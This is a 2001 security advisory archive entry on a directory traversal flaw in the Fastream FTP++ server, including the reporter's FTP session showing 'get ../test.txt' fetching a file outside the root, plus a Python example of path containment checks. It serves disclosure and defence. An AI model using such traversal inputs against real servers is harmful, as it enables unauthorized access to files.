SecurityTracker.com
SecurityTracker Archives

Category:   Application (File Transfer/Sharing)  >   FTP++ (Fastream)
Vendors:   Fastream Technologies
Fastream Technologies FTP++ Server for Windows Gives Access to Files and Directories Outside the Server's Main Directory
SecurityTracker Alert ID:  1000989
SecurityTracker URL:  http://securitytracker.com/id/1000989
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Mar 6 2001
Impact:   Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Version(s): Beta 11
Description:   The Fastream Technologies Windows-based FTP++ server contains a vulnerability that allows authorized users to remotely access files and directories outside of the server's root directory. In addition, the server provides the user with real path names instead of virtual path names.

A transcript of a vulnerable session is contained in the original report.

The author has reportedly been contacted.

Impact:   An authorized user with remote or local access to the FTP++ daemon can obtain files outside of the server's root directory.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.fastream.com/ftppp.htm
Cause:   Access control error
Underlying OS:  Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Re: Fastream Technologies FTP++ Server for Windows Gives Access to Files and Directories Outside the Server's Main Directory
This is a follow-up message in which SNS Research reports that this was fixed in an earlier beta (tested by SNS Research); however, the fix apparently wasn't incorporated in the latest version.
Re: Fastream Technologies FTP++ Server for Windows Gives Access to Files and Directories Outside the Server's Main Directory
The vendor indicates that the problem has been fixed and that the fixed release (Beta 12) will be available in approximately one week.



 Source Message Contents

Subject:  Fastream FTP++ Client 2 Beta 11 (built-in server) Vulnerability


The Fastream FTP built-in server responds with the real path of the directory instead of a virtual one. It is possible to get files outside of the root dir.

e:\crap was used as root directory

1. directory path

230 User anonymous logged in.
ftp> pwd
257 "/E:/crap/" is current directory.

2. getting files from outside of root

ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw-   1 ftp      ftp            0 Feb 28 13:46 .
drw-rw-rw-   1 ftp      ftp            0 Feb 28 13:46 ..
drw-rw-rw-   1 ftp      ftp            0 Mar 02 12:17 test
-rw-rw-rw-   1 ftp      ftp            6 Mar 02 12:33 movedtohomedir.txt
-rw-rw-rw-   1 ftp      ftp           11 Mar 02 00:29 bisontest.txt
drw-rw-rw-   1 ftp      ftp            0 Mar 03 15:59 HTTP
drw-rw-rw-   1 ftp      ftp            0 Mar 03 17:05 huhu
226 File sent ok
FTP: 438 Bytes empfangen in 0,00Sekunden 438000,00KB/s
ftp> get ../test.txt
200 Port command successful.
150 Opening data connection for ../test.txt.
226 File sent ok
FTP: 15 Bytes empfangen in 0,01Sekunden 1,50KB/s

Solution:
No quick fix possible. Use with care.

Author has been contacted on 04.Mar.2001

se00020@fhs-hagenberg.ac.at
se00020@lion.cc
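As an added example (not code from the vendor or the reporter), here are the two checks the transcript above shows missing: client paths are resolved inside a virtual namespace rooted at "/", so "../test.txt" from the root is refused instead of reaching E:\, and PWD answers with the virtual path rather than the real one. SERVER_ROOT, the function names and the reply strings are assumptions modelled on the session above.

```python
import ntpath
import posixpath

# Constructed root, matching the e:\crap root used in the report above.
SERVER_ROOT = r"E:\crap"

class PathEscapeError(ValueError):
    """A client-supplied path would leave the FTP root, or is malformed."""

def canonical_virtual_path(cwd: str, requested: str) -> str:
    """Resolve a client path inside the '/'-rooted virtual namespace; a '..'
    that climbs above '/' is an error, not silently clamped."""
    if "\0" in requested:
        raise PathEscapeError("NUL byte in path")
    requested = requested.replace("\\", "/")  # Windows accepts both separators
    joined = requested if requested.startswith("/") else posixpath.join(cwd, requested)
    parts = []
    for seg in joined.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not parts:
                raise PathEscapeError(f"path escapes root: {requested!r}")
            parts.pop()
        elif ":" in seg:  # drive letters and NTFS stream syntax never belong here
            raise PathEscapeError(f"illegal segment: {seg!r}")
        else:
            parts.append(seg)
    return "/" + "/".join(parts)

def to_real_path(virtual: str) -> str:
    """Map a canonical virtual path under SERVER_ROOT, re-checking containment."""
    real = ntpath.normpath(ntpath.join(SERVER_ROOT, virtual.lstrip("/").replace("/", "\\")))
    root = ntpath.normcase(SERVER_ROOT)
    if ntpath.normcase(real) != root and not ntpath.normcase(real).startswith(root + "\\"):
        raise PathEscapeError(f"real path {real!r} is outside the root")
    return real

def pwd_reply(cwd: str) -> str:
    """PWD reports the virtual cwd only; the real path never reaches the client."""
    return f'257 "{cwd}" is current directory.'

def retr_reply(cwd: str, arg: str) -> str:
    """Reply line for RETR: 550 for any escape attempt, 150 otherwise."""
    try:
        to_real_path(virtual := canonical_virtual_path(cwd, arg))
    except PathEscapeError:
        return "550 Permission denied."
    return f"150 Opening data connection for {virtual}."
```

The containment re-check in to_real_path is defence in depth: ntpath.join discards the root when handed a drive-qualified second component, so a single canonicalisation step is not enough on Windows.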

Copyright 2019, SecurityGlobal.net LLC